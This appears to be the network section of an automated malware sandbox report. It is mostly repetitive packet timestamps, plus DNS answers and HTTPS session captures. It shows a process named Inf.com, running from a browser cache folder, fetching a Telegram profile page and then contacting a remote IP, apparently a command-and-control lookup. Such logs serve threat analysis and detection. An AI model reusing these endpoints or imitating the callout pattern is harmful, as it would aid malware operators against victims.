                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.054814100 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.054822922 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.063913107 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.063921928 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.063930988 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064059973 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064070940 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064080954 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064089060 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064093113 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064251900 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064261913 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.064271927 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.073688984 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.073843956 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.074014902 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.101655960 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.382611990 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.425200939 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430058956 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430278063 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430314064 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430370092 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430495977 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430557966 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430571079 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430656910 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430668116 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430711985 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.430721045 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.446130037 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.769762993 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.774529934 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.774808884 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775105953 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775125980 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775162935 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775325060 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775336027 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.775347948 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.194412947 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.194561005 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.194607973 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.194618940 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.203140020 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.203260899 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.203361034 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.294531107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.475765944 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.625607967 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.630748034 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.630803108 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.630897045 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.631031990 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.632056952 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.663420916 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.954679012 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.954766035 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.967412949 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.290786982 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297563076 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297786951 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297815084 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297879934 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297892094 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297918081 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.297926903 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.321645975 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.645324945 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.652841091 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.653008938 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.653111935 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.653120041 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.653167009 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.662620068 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.985996008 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.991707087 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992033005 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992104053 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992227077 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992280960 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992292881 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992322922 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992392063 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992403984 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.992413998 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.006321907 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.329608917 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.335669041 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336280107 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336317062 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336359024 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336494923 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336505890 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336515903 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336528063 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336663008 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336694002 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336704969 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336715937 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336846113 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336857080 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336868048 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336879015 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336888075 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336890936 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.336901903 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.354950905 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.678323984 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.684418917 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.684619904 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.684698105 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.684706926 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.685096979 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.685110092 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.685121059 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.685249090 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.685261011 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.237101078 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.264800072 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270078897 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270092010 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270167112 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270447016 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.281809092 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.605278015 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611761093 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611773014 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611865044 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.612194061 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.620270967 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.945317030 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951141119 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951196909 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951241970 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.959119081 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.987608910 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.005644083 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.307548046 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.329327106 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333662033 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333719015 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333811998 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.334292889 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.361489058 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.368688107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.866985083 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869360924 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869374037 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869384050 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869395018 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869405985 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.870471954 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.888597012 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.189065933 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.189634085 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.192024946 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.197535992 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.217479944 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.219331980 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222626925 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222665071 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222827911 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.223066092 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.234205008 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.557714939 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564204931 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564214945 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564316034 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564450979 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.571033001 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.894473076 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900109053 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900196075 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900245905 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900367022 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.906469107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.235735893 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241005898 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241219044 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241271973 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241888046 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.246474028 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.573210001 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578737020 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578773975 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578944921 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578955889 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.584971905 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.908485889 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913305998 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913338900 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913444042 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913793087 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.918997049 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.242474079 CET4435633523.209.72.40192.168.2.5
Timestamp                            Source IP    Dest IP  Checksum  Code                Type
Dec 27, 2024 07:01:28.614265919 CET  192.168.2.5  1.1.1.1  c210      (Port unreachable)  Destination Unreachable
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727423906 CET1.1.1.1192.168.2.50x388aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730139971 CET1.1.1.1192.168.2.50x219cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730139971 CET1.1.1.1192.168.2.50x219cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730242968 CET1.1.1.1192.168.2.50x937dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730977058 CET1.1.1.1192.168.2.50x92ddNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730977058 CET1.1.1.1192.168.2.50x92ddNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.731477022 CET1.1.1.1192.168.2.50xcbb4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.963973999 CET1.1.1.1192.168.2.50x471aNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.964276075 CET1.1.1.1192.168.2.50xb0cbNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.100234985 CET1.1.1.1192.168.2.50x899aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.102147102 CET1.1.1.1192.168.2.50x8db4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.235974073 CET1.1.1.1192.168.2.50xcab5No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.237844944 CET1.1.1.1192.168.2.50xbbf1No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:31.120441914 CET1.1.1.1192.168.2.50xa637No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:31.120441914 CET1.1.1.1192.168.2.50xa637No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                                                                  • bijutr.shop
                                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                    • c.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49750 | 149.154.167.99 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:39 UTC | 85 | OUT | GET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:00:40 UTC | 512 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:40 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                  Content-Length: 12298
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=588d1eda4582a992fd_15225848869441408925; expires=Sat, 28 Dec 2024 06:00:40 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
2024-12-27 06:00:40 UTC | 12298 | IN | Data Ascii:
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Telegram: Contact @k04ael</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49756 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:42 UTC | 231 | OUT | GET / HTTP/1.1
